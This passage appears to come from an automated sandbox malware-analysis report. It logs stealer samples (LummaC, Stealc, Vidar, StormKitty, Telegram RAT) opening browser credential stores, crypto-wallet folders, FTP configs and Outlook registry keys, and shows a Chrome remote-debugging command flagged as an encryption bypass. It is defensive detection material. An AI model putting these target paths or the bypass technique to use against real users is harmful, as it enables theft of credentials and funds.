Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Binance\Local State
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\XQACHMZIHU
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\XQACHMZIHU
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA

Source: Yara match	File source: 25.2.soonmaintain.exe.1c595d68508.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.InstallUtil.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.soonmaintain.exe.1c595d68508.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000003.3876667619.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.3875739949.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.3879611236.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000003.4017208405.0000000001254000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2205307367.0000000001258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.3809039923.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3783415700.000001C5AE46E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3734030557.000001C59617A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i8Vwc7iOaG.exe PID: 3640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Y71AV1VIPLT8Y663WBDXSB.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: soonmaintain.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: i8Vwc7iOaG.exe PID: 3640, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3141398938.0000000000C41000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3147595579.000000000121E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y71AV1VIPLT8Y663WBDXSB.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, type: DROPPED

Yara detected StormKitty Stealer

Source: Yara match	File source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 20.2.52ba7a538c.exe.1e58000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.52ba7a538c.exe.1e32000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.52ba7a538c.exe.1e0c000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
